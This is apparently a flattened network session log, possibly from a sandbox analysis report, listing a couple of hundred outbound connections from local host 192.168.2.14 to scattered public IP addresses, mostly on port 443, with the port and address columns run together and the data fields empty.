                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22087192.168.2.1450046131.102.42.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22088192.168.2.1459994129.131.169.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22089192.168.2.145917858.70.226.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22090192.168.2.1460364151.109.118.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22091192.168.2.1456176161.55.30.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22092192.168.2.1450250182.53.251.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22093192.168.2.145032025.244.208.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22094192.168.2.144128088.225.172.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22095192.168.2.1444432177.254.240.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22096192.168.2.145356617.135.253.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22097192.168.2.144985827.10.194.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22098192.168.2.1447128109.212.239.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22099192.168.2.145961490.193.22.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22100192.168.2.145980420.117.41.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22101192.168.2.145160880.6.202.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22102192.168.2.143786072.108.78.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22103192.168.2.1451682181.134.53.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22104192.168.2.143987052.132.182.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22105192.168.2.1445390196.57.207.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22106192.168.2.1457260213.133.90.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22107192.168.2.143782475.120.225.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22108192.168.2.1435330158.144.239.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22109192.168.2.143656484.116.31.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22110192.168.2.1438588133.5.68.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22111192.168.2.1457138132.215.214.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22112192.168.2.1435234168.221.111.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22113192.168.2.1456750190.154.14.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22114192.168.2.1445730147.18.42.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22115192.168.2.1448624122.173.235.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22116192.168.2.1450286222.145.117.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22117192.168.2.143552238.115.78.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22118192.168.2.1447066123.243.163.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22119192.168.2.145241094.247.201.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22120192.168.2.145121689.31.109.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22121192.168.2.1455900129.72.96.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22122192.168.2.1446438197.212.70.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22123192.168.2.145404489.149.128.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22124192.168.2.14456328.92.69.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22125192.168.2.1444854202.110.167.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22126192.168.2.1449468210.218.216.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22127192.168.2.1451176209.107.53.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22128192.168.2.1457452152.51.107.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22129192.168.2.143344217.72.214.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22130192.168.2.144055877.75.12.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22131192.168.2.1453204184.202.227.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22132192.168.2.1434422170.113.111.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22133192.168.2.145476282.207.91.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22134192.168.2.144517693.121.27.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22135192.168.2.1433702158.118.59.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22136192.168.2.1439278147.120.31.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22137192.168.2.1447168101.96.125.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22138192.168.2.14479742.170.65.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22139192.168.2.1458694101.230.82.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22140192.168.2.1439014217.84.159.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22141192.168.2.1443818130.27.34.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22142192.168.2.1439418164.224.245.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22143192.168.2.1453344163.126.62.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22144192.168.2.1439868168.120.190.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22145192.168.2.1443468132.156.156.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22146192.168.2.143352092.140.24.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22147192.168.2.145762813.84.49.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22148192.168.2.1458654221.220.63.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22149192.168.2.145946025.132.209.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22150192.168.2.145839083.64.142.428080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22151192.168.2.14535548.153.97.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22152192.168.2.1456076207.76.226.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22153192.168.2.1460004159.9.105.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22154192.168.2.145870679.99.53.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22155192.168.2.1444098119.98.78.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22156192.168.2.1454116193.230.78.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22157192.168.2.145431690.0.203.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22158192.168.2.1451882217.156.195.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22159192.168.2.1451830184.10.32.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22160192.168.2.144239217.129.94.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22161192.168.2.144877673.97.94.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22162192.168.2.1440914170.133.59.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22163192.168.2.145563653.220.163.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22164192.168.2.1455858105.98.28.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22165192.168.2.1434716149.95.250.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22166192.168.2.1460216222.214.161.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22167192.168.2.1445144153.29.139.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22168192.168.2.1450586155.70.231.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22169192.168.2.143977059.212.14.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22170192.168.2.144713879.45.135.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22171192.168.2.14378829.29.224.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22172192.168.2.1456674153.62.36.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22173192.168.2.144723652.143.159.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22174192.168.2.145628653.172.24.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22175192.168.2.1444228137.50.189.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22176192.168.2.1457048211.150.80.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22177192.168.2.1456232183.227.208.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22178192.168.2.1440860134.113.227.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22179192.168.2.1458786179.186.127.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22180192.168.2.1441106162.53.147.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22181192.168.2.1455074223.229.23.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22182192.168.2.1441730101.226.112.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22183192.168.2.143395217.173.148.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22184192.168.2.1434724184.2.71.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22185192.168.2.1443874176.108.135.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22186192.168.2.1441036118.199.184.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22187192.168.2.144384265.133.220.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22188192.168.2.145769084.134.153.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22189192.168.2.145002658.77.18.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22190192.168.2.1448588213.214.69.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22191192.168.2.1457756210.52.250.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22192192.168.2.1439998171.46.155.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22193192.168.2.1444060186.214.29.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22194192.168.2.144508080.82.150.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22195192.168.2.143495089.152.8.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22196192.168.2.1441556186.106.15.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22197192.168.2.145480868.214.53.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22198192.168.2.1456426135.92.228.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22199192.168.2.143379032.214.23.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22200192.168.2.1454776116.182.238.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22201192.168.2.1446560211.79.5.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22202192.168.2.1460970133.57.10.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22203192.168.2.1436266197.0.11.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22204192.168.2.1440314144.192.237.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22205192.168.2.145714299.182.18.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22206192.168.2.1453544100.5.155.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22207192.168.2.143870840.150.211.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22208192.168.2.144816262.104.179.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22209192.168.2.1446444116.118.248.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22210192.168.2.1453392174.35.231.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22211192.168.2.143731217.2.221.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22212192.168.2.143866031.12.95.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22213192.168.2.1456680135.202.214.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22214192.168.2.144007871.71.18.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22215192.168.2.1453764195.12.130.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22216192.168.2.145487227.204.230.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22217192.168.2.1447472175.63.83.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22218192.168.2.1447018134.165.74.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22219192.168.2.1440084202.150.182.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22220192.168.2.1451896183.15.53.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22221192.168.2.1440790195.73.130.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22222192.168.2.143503467.7.215.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22223192.168.2.145919023.233.253.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22224192.168.2.1435776105.183.132.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22225192.168.2.144169218.21.97.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22226192.168.2.14376804.68.69.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22227192.168.2.1434376122.53.179.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22228192.168.2.144377851.86.124.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22229192.168.2.1454008102.23.49.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22230192.168.2.144920296.252.250.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22231192.168.2.1443264119.73.6.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22232192.168.2.1436174193.248.71.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22233192.168.2.144828423.219.41.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22234192.168.2.1446628150.255.10.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22235192.168.2.145805880.86.236.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22236192.168.2.143474091.198.225.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22237192.168.2.145286458.208.4.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22238192.168.2.145011457.2.199.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22239192.168.2.145831040.90.129.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22240192.168.2.1456560107.100.158.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22241192.168.2.1437564185.52.191.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22242192.168.2.1436240165.194.62.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22243192.168.2.1456112156.125.68.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22244192.168.2.1439418180.89.225.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22245192.168.2.145311689.25.70.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22246192.168.2.144335298.78.97.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22247192.168.2.1440156172.115.194.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22248192.168.2.145731447.238.247.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22249192.168.2.145696094.237.252.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22250192.168.2.1443034147.192.0.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22251192.168.2.145808017.75.207.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22252192.168.2.14375221.93.36.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22253192.168.2.1445744137.71.61.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22254192.168.2.1457428170.169.102.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22255192.168.2.1442456177.60.15.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22256192.168.2.1433048205.188.240.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22257192.168.2.1444640192.212.192.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22258192.168.2.1450334219.129.26.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22259192.168.2.1446062223.44.105.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22260192.168.2.1455904209.225.12.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22261192.168.2.1439464118.234.15.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22262192.168.2.145721473.165.55.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22263192.168.2.1454678102.100.43.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22264192.168.2.1446666222.139.33.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22265192.168.2.1458590179.31.249.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22266192.168.2.1458354199.242.17.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22267192.168.2.143655281.51.210.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22268192.168.2.1435628118.21.92.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22269192.168.2.14441424.48.185.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22270192.168.2.144678271.97.21.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22271192.168.2.1456970125.103.36.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22272192.168.2.1447426168.250.33.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22273192.168.2.1442794148.98.12.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22274192.168.2.145169680.69.233.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22275192.168.2.145944250.250.202.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22276192.168.2.1439820213.96.85.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22277192.168.2.1442432208.50.219.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22278192.168.2.1460572118.185.149.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22279192.168.2.143398067.49.171.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22280192.168.2.1455624154.15.101.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22281192.168.2.1452730152.79.114.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22282192.168.2.1449580151.112.118.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22283192.168.2.144201212.94.86.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22284192.168.2.1459336187.219.85.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22285192.168.2.14335669.172.191.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22286192.168.2.144977880.225.243.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22287192.168.2.1441686181.97.177.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22288192.168.2.1457614181.20.202.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22289192.168.2.1458000135.42.7.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22290192.168.2.1438534203.20.38.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22291192.168.2.1434822140.183.64.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22292192.168.2.145963443.19.80.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22293192.168.2.143989079.221.62.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22294192.168.2.145350041.88.73.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22295192.168.2.143686462.181.148.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22296192.168.2.143637693.147.92.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22297192.168.2.1440376169.148.132.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22298192.168.2.145147437.130.55.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22299192.168.2.1448554200.253.102.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22300192.168.2.1454922151.244.145.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22301192.168.2.145168424.47.202.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22302192.168.2.1434166152.241.117.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22303192.168.2.143418638.18.104.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22304192.168.2.144774039.57.11.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22305192.168.2.1444706192.110.54.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22306192.168.2.144788612.175.128.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22307192.168.2.1460560137.198.43.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22308192.168.2.144915475.93.47.39443
